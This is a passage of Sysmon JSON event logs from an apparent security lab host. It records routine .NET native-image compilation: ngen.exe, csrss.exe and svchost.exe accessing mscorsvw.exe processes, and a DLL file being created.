05:59:36.481","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04B6-5F25-0000-0010EA281000}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7503,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.481\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04B6-5F25-0000-0010EA281000}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.481","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04B6-5F25-0000-0010EA281000}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7504,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.496\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010198B1000}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.496","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010198B1000}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7505,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:36.778\r\nProcessGuid: {A837DB8D-04C8-5F25-0000-0010198B1000}\r\nProcessId: 2672\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a70-0\\System.Dynamic.dll\r\nCreationUtcTime: 2020-08-01 05:59:36.778","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:36.778","ProcessGuid":"{A837DB8D-04C8-5F25-0000-0010198B1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a70-0\\System.Dynamic.dll","CreationUtcTime":"2020-08-01 05:59:36.778","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7506,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.809\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04B8-5F25-0000-00105D2D1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.809","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04B8-5F25-0000-00105D2D1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7507,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.809\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04B8-5F25-0000-00105D2D1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.809","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04B8-5F25-0000-00105D2D1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7508,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.825\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010728E1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.825","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010728E1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7509,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.856\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010DA911000}\r\nTargetProcessId: 2580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.856","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010DA911000}","TargetProcessId":"2580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7510,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.856\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010DA911000}\r\nTargetProcessId: 2580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.856","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010DA911000}","TargetProcessId":"2580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7511,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.871\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010DA911000}\r\nTargetProcessId: 2580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 